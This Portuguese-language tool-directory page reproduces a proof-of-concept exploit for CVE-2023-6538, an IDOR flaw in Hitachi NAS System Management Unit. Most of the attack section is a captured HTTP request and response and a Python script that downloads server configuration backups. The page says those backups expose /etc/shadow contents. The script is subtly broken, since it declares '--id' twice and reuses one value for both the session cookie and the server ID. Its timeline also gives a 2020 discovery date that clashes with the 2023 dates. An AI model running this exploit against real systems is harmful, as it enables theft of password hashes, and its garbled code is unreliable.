Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-6538 — Prova de conceito de exploit para CVE-2023-6538, uma vulnerabilidade IDOR no Hitachi NAS System Management Unit que permite que usuários não privilegiados baixem cópias de segurança da configuração do servidor contendo dados sensíveis. | Kitploit
Ferramentas/GitHubGitHub/arszilla/cve-2023-6538
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubarszilla/cve-2023-6538

CVE-2023-6538

Prova de conceito de exploit para CVE-2023-6538, uma vulnerabilidade IDOR no Hitachi NAS System Management Unit que permite que usuários não privilegiados baixem cópias de segurança da configuração do servidor contendo dados sensíveis.

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-6538

CVE-2023-6538 é uma vulnerabilidade de Referência Direta a Objetos Insegura (IDOR) encontrada na funcionalidade Configuration Backup & Restore da System Management Unit (SMU) do Hitachi NAS (HNAS). Esta vulnerabilidade afeta versões do SMU anteriores à 14.8.7825.01.

Exploração

Este exploit requer que o invasor tenha controle sobre as credenciais de uma conta de usuário que não seja Read-Only (Somente Leitura) ou Global Administrator (Administrador Global), ou seja:

  • Storage Administrator (Administrador de Armazenamento)
  • Server Administrator (Administrador de Servidor)
  • Server + Storage Administrator (Administrador de Servidor + Armazenamento)

Por design, os usuários com a função Global Administrator devem ser capazes de acessar a funcionalidade Configuration Backup & Restore do SMU, localizada em https://<HOSTNAME/FQDN/IP>/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid=1 e enviar a seguinte requisição, que criaria e baixaria o backup da configuração do servidor selecionado (ou seja, um servidor conectado ao SMU):

root@kitploit:~
GET /mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid=1 HTTP/1.1
Host: REDACTED
Cookie: JSESSIONID=REDACTED; JSESSIONIDSSO=REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://REDACTED/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Se a requisição for bem-sucedida, o SMU responde com a seguinte resposta e inicia o download de registry_data.tgz:

root@kitploit:~
HTTP/1.1 200 
Cache-Control: PRIVATE
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
P3P: CP="NOI DSP CUR ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: cache
Content-Disposition: attachment;filename=registry_data.tgz
Content-Type: application/download
Content-Length: 3169247
Date: Fri, 14 Apr 2023 09:30:03 GMT
Connection: close
Server: SMU

[DATA]

No entanto, devido a uma falha na lógica de negócios do SMU, um invasor com acesso a uma conta Storage Administrator, Server Administrator ou Server + Storage Administrator pode atualizar os cookies JSESSIONID e JSESSIONIDSSO para corresponder aos cookies do usuário que ele possui, permitindo-lhe baixar o arquivo de configuração. Além disso, o invasor também pode atualizar o parâmetro serverid na requisição para enumerar e baixar o arquivo de configuração de diferentes servidores conectados ao SMU.

Assim, um script como CVE-2023-6538.py poderia ser usado para explorar essa vulnerabilidade:

root@kitploit:~
#!/usr/bin/python3
#
# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Configuration Backup & Restore IDOR Vulnerability 
# CVE:              CVE-2023-6538
# Date:             2023-12-13
# Exploit Author:   Arslan Masood (@arszilla)
# Vendor:           https://www.hitachivantara.com/
# Version:          < 14.8.7825.01
# Tested On:        13.9.7021.04     

import argparse
from os import getcwd

import requests

parser = argparse.ArgumentParser(
    description="CVE-2023-6538 PoC",
    usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
    )

# Create --host argument:
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
    )

# Create --sso argument:
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="Server ID value"
    )

args = parser.parse_args()

def download_file(hostname, jsessionid, jsessionidsso, serverid):
    # Set the filename:
    filename = "registry_data.tgz"

    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"

    # GET request cookies
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # GET request headers:
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # Send the request:
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        with open(filename, 'wb') as backup_archive:
            # Write the zip file to the CWD:
            backup_archive.write(file_download.content)

    print(f"{filename} has been downloaded to {getcwd()}")

if __name__ == "__main__":
    download_file(args.host, args.id, args.sso, args.id)

A justificativa da pontuação CVSS v3.1 de 7.6 pode ser melhor compreendida examinando registry_data.tgz:

root@kitploit:~
$ tree -a
.
├── backup.properties
├── registry5.11.db1
├── registry5.13.db1
├── registry5.14.db1
├── registry5.15.db1
├── registry5.1.db1
├── registry5.2.db1
├── registry5.3.db1
├── registry5.4.db1
├── registry5.5.db1
├── registry5.6.db1
├── registry5.7.db1
├── registry5.8.db1
└── registry5.db1

1 directory, 14 files

O arquivo .tgz contém várias configurações e informações sobre o servidor conectado ao SMU:

registry5

Como visto na imagem editada acima, registry5.db1 contém o conteúdo de /etc/shadow (encontrado via regex) do servidor selecionado.

Notas

Esta vulnerabilidade é uma "vulnerabilidade irmã" de CVE-2023-5808.

Referências

  • CVE-2023-5808
  • CVE-2023-6538
  • Boletim de Segurança Hitachi Vantara para CVE-2023-6538

Linha do Tempo

  • 2020-04-12 - Vulnerabilidade descoberta
  • 2023-04-20 - Vulnerabilidade reportada para [email protected]
  • 2023-08-11 - Atribuição inicial do número CVE
  • 2023-12-06 - Números CVE reatribuídos
  • 2023-12-11 - Números CVE reatribuídos
  • 2023-12-11 - CVE publicado
  • 2023-12-13 - Divulgação pública
Baixar ferramenta